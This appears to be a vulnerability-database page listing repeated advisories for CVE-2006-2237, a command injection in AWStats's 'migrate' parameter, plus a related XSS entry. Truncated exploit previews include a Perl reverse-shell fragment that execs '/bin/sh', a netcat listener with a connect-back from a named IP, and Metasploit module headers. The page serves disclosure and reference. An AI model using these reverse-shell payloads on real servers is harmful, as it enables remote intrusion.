CVE-2006-2237

The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...

Code injection

The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...

CVE-2006-2237

The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...

DEBIAN-CVE-2006-2237

The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...

CVE-2006-2237

The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...

CVE-2006-2237

AWStats 6.4 and 6.5 are affected by CVE-2006-2237 due to missing sanitization of the migrate parameter, enabling remote code execution when statistics updates are enabled. Evidence from multiple advisories and exploit records shows an external attacker could run arbitrary commands via the migrate...

CVE-2006-2237

The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...

CVE-2006-2237

The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...

AWStats migrate Parameter Arbitrary Command Execution

The remote host is running AWStats, a free logfile analysis tool written in Perl. The version of AWStats installed on the remote host fails to sanitize input to the 'migrate' parameter before passing it to a Perl 'open' function. Provided 'AllowToUpdateStatsFromBrowser' is enabled in the AWStats...

AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit

Exploit for cgi platform in category web applications =============================================================== AWStats &CLIENT";openSTDOUT,"&CLIENT";openSTDERR,"&CLIENT";ifforkexec "/bin/sh"; exit0; ;''; class rbawstatsMigrate: url = '' user = '' password = '' auth = False chost =False...

AWStats &lt;= 6.5 (migrate) Remote Shell Command Injection Exploit

No description provided by source. !/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org...

AWStats 6.5 - migrate Remote Shell Command Injection

AWStats 6.5 - migrate Remote Shell Command Injection !/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from...

AWStats 6.5 - &#039;migrate&#039; Remote Shell Command Injection

!/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org 65.99.197.147 53377 id uid=81apach...

AWStats 6.4-6.5 AllowToUpdateStatsFromBrowser Command Injection

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

AWStats 6.4 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)

AWStats 6.4 6.5 - AllowToUpdateStatsFromBrowser Command Injection Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

AWStats 6.4 &lt; 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)

$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'AWStats...

awstats -- arbitrary command execution vulnerability

OS Reviews reports: If the update of the stats via web front-end is allowed, a remote attacker can execute arbitrary code on the server using a specially crafted request involving the migrate parameter. Input starting with a pipe character "|" leads to an insecure call to Perl's open function and...

CVE-2006-1945

Cross-site scripting XSS vulnerability in awstats.pl in AWStats 6.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the config parameter. NOTE: this might be the same core issue as CVE-2005-2732...

DEBIAN-CVE-2006-1945

Cross-site scripting XSS vulnerability in awstats.pl in AWStats 6.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the config parameter. NOTE: this might be the same core issue as CVE-2005-2732...

Cross site scripting

Cross-site scripting XSS vulnerability in awstats.pl in AWStats 6.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the config parameter. NOTE: this might be the same core issue as CVE-2005-2732...